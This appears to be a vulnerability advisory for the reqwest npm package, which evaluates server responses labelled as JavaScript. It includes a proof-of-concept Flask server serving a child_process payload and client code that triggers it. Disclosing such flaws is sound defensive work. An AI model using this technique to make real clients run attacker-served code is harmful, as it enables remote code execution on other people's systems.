Summary

Affected versions of the reqwest npm package are vulnerable to remote code execution when requesting a malicious URL: a server that returns a JavaScript content type can have its response body executed by the client.

Product

All versions of the reqwest npm package.

Impact

This issue may lead to remote code execution if the URL fetched is untrusted input.

Steps to reproduce

  1. Run the following server:

from flask import Flask, Response
app = Flask(__name__)


@app.route('/')
def hello():
    # The body is a JavaScript payload; the Content-Type header makes the client treat it as script
    resp = Response("Foo bar baz")
    resp.data = 'require("child_process").exec("calc")'
    resp.headers["Content-Type"] = "javascript"
    return resp


if __name__ == '__main__':
    app.run(host='0.0.0.0', port=5555, debug=True)

  2. Make a GET request to the server:

var reqwest = require('reqwest')
reqwest({
  url: 'http://localhost:5555/'
  , method: 'get'
  , success: function (resp) {
    // qwery is a DOM helper assumed to be available in the page; the payload runs when reqwest evaluates the response body
    qwery('#content').html(resp)
  }
})

Expected result:

A calculator will pop up on the server.

Remediation

Currently there is no fixed version released.

Credit

This issue was discovered and reported by Checkmarx SCA Security Researcher Yaniv Nizry.

Resources

  1. reqwest npm repository